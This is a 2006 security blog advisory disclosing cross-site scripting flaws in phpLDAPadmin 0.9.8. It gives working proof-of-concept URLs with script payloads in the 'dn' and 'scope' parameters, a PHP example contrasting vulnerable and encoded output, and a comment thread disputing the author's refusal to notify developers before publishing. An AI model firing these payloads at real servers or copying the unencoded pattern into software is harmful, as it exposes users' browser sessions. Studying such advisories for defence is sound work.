by r0t, der4444, cembo, VietMafia

Friday, April 21, 2006

phpLDAPadmin multiple vuln.

phpLDAPadmin vuln.

###############################################
Vuln. discovered by: r0t
Date: 21 April 2006
Vendor link: http://phpldapadmin.sourceforge.net/
Affected versions: phpLDAPadmin 0.9.8 and prior
###############################################

Vuln. Description:

phpLDAPadmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "dn" parameter in "compare_form.php", "copy_form.php", "rename_form.php", "template_engine.php" and "delete_form.php" isn't properly sanitised before being returned to the user, and input passed to the "scope" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Examples:

/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/delete_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert('r0t')%3C/script%3E


There is also a script insertion (HTML injection) vuln.:

For example, take "/template_engine.php" and enter script input into these fields:
Container DN: [XSS]
Machine Name: [XSS]
UID Number: [XSS]
These fields aren't sanitised before being stored in the vulnerable system. This can be exploited to execute arbitrary script code in a user's browser session in the context of an affected website when a malicious system entry is viewed.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
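The `%22` (a double quote) at the start of every sample value above is the tell: the parameter is being echoed straight into a double-quoted HTML attribute. The following is an added illustration, not phpLDAPadmin's own code; it assumes the affected pages carry "dn" in a hidden form field, and the function and field names are made up for the example.

```php
<?php
// Constructed example, not phpLDAPadmin source. Assumes the affected pages
// echo the request's "dn" into a hidden form field roughly like this.

// Vulnerable: the raw parameter is written into a double-quoted attribute.
// A value beginning with %22 (") closes the attribute early, so the rest
// of the value is parsed by the browser as markup.
function hidden_dn_vulnerable(string $dn): string
{
    return '<input type="hidden" name="dn" value="' . $dn . '" />';
}

// Hardened: encode on output for the HTML attribute context. ENT_QUOTES
// covers both " and ', so the value cannot terminate the attribute, and
// < > & are neutralised for the element context as well.
function hidden_dn_safe(string $dn): string
{
    $enc = htmlspecialchars($dn, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="dn" value="' . $enc . '" />';
}

// The same rule covers the stored case in the advisory: attribute values
// read back from the directory (Container DN, Machine Name, UID Number)
// are untrusted too and must be encoded when the entry is displayed.
function display_attr(string $label, string $value): string
{
    return '<tr><td>' . htmlspecialchars($label, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '</td><td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '</td></tr>';
}

// Quick self-check with a constructed input shaped like the report's.
$dn = $_GET['dn'] ?? '"><b>constructed</b>';
echo hidden_dn_vulnerable($dn), "\n"; // attribute is broken open
echo hidden_dn_safe($dn), "\n";        // &quot;&gt;&lt;b&gt;... stays inert
echo display_attr('Machine Name', $dn), "\n";
```

Run it from the command line to compare the two outputs; the encoded form keeps the value inside the attribute regardless of what characters it contains.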
More information @ unsecured-systems.com/forum/

11 Comments:

Anonymous Anonymous told...

Did you follow the generally accepted procedure for reporting this vulnerability? I.e., did you contact the lead developer to provide details and wait for him/her to release a fixed version?

3:50 AM

 
Blogger r0t told...

1."generally accepted procedure" ???


"did you contact the lead developer to provide details and wait for him/her to release a fixed version"


1. I don't accept general procedures at all.

2. Read the FAQ.
We don't provide anything to developers privately. All of those blog reports are for open minds*...
We report on unsecured systems on the net... If you are unsure about your work, you can give it to the guys to research/audit for free (more info on the board).

PS. RSS feeds aren't bad...

9:00 AM

 
Anonymous Anonymous told...

Wow. You are doing nothing good for the open source community. Congratulations. You are a leech.

7:41 PM

 
Blogger r0t told...

"open source community" - you mean that you are an open source lead developer?
Who cares, I do my stuff, you do your stuff... I have big respect for every developer and I think that you guys are good, but as I told you, do your job, I do mine.
Good or bad...? Who says?
Do you know the meaning of the word "leech"?

10:35 PM

 
Anonymous Anonymous told...

If you respect developers, you ought to show it by trying to help them. You are doing a disservice to developers by publicly releasing vulnerabilities before the developers have a chance to release a fix. If you really respected open source developers, you would privately inform them of the vulnerability first, then give them time to issue a security fix release, and then publicly release the details of the vulnerability.

What you are currently doing is causing lots of users pain by basically informing black hat crackers about vulnerabilities before there is even a fix available.

2:40 AM

 
Anonymous Anonymous told...

Fix your process. People are complaining.

http://article.gmane.org/gmane.comp.ldap.davedap/2981

4:56 PM

 
Blogger r0t told...

Interesting point: "black hat crackers". Are there also "white & grey hat crackers" :) ?
I only knew till now that some people give "hats" with colours to "hackers"...
As I know, a cracker is a cracker....
OK, let's look at reporting and waiting for the developer fix.
Do you think that I show disrespect because I do not contact the developer?
No, I don't lose my respect by not having private contact with developers... Is all respect in contacts?
I know that some of my reports can be painful to some users, but look at most bugtraq published advisories or vuln. reports; they are not less painful for software users.
It's nothing personal, it's just the way I express myself..

11:01 PM

 
Anonymous Anonymous told...

I couldn't parse your last comment. Please correct your English syntax errors.

Here's how it should work:

1. Report to developers in private.
2. Wait for them to release a fix.
3. Report to public.

The Result: Happy users. Happy developers. Sad crackers.

If you report to the public first, the result is: Mad users, mad developers, happy crackers.

Can you see my point yet?

P.S. I can't believe I'm wasting these keystrokes on an ignorant, arrogant, self-serving prepubescent script kiddie who has clearly never even heard the terms white hat or black hat.

5:39 PM

 
Anonymous Anonymous told...

The point is that you should notify the developers of the vulnerability, even if you publish your report at the same time.

Otherwise, the users of the application need to inform the developers which is really bad. The bugs can be fixed much faster if the developers know of the bug.

2:10 AM

 
Blogger r0t told...

Yes, I see your point very clearly.
Yes, and sorry for my English.

But you again have more mistakes in your terms than in your grammar... grammar is almost perfect but your terms...

"I can't believe I'm wasting these keystrokes on an ignorant, arrogant, self-serving prepubescent script kiddie who has clearly never even heard the terms white hat or black hat."

As I said, I never heard about black & white hat "crackers"... about hackers I heard... I think there must be a difference...

Look, you are one of those developers who think and believe that they are white hat hackers... do you think it isn't childish?

And can you tell me, how can some person be a "script kiddie" if at some point he is better than a developer who thinks that he is a "white hat hacker"?

Can you also show at which point that script kiddie has shown his arrogance? I know where the ignorance is in his work, but arrogance?

And do you think that any person who will not follow those rules that you follow, or that you would like people to follow... that person will be less intelligent?
Look, if somebody shows you your mistakes... in any way he can't be less intelligent than you on that point.

And do you think that if I choose to help crackers and not developers first, then I will be more arrogant, ignorant and more of a script kiddie, etc., than if I choose to be a "good boy" and help developers first?

Even though I'm too young, I can maybe understand some points better than you... so, please try to be more objective to others and yourself.

And you must understand that knowledge isn't black or white...

12:34 PM

 
Anonymous Anonymous told...

I'm starting to wonder if this is just a Turing-test bot.

4:39 PM

 
Copyright (c) 2006 Pridels Sec Crew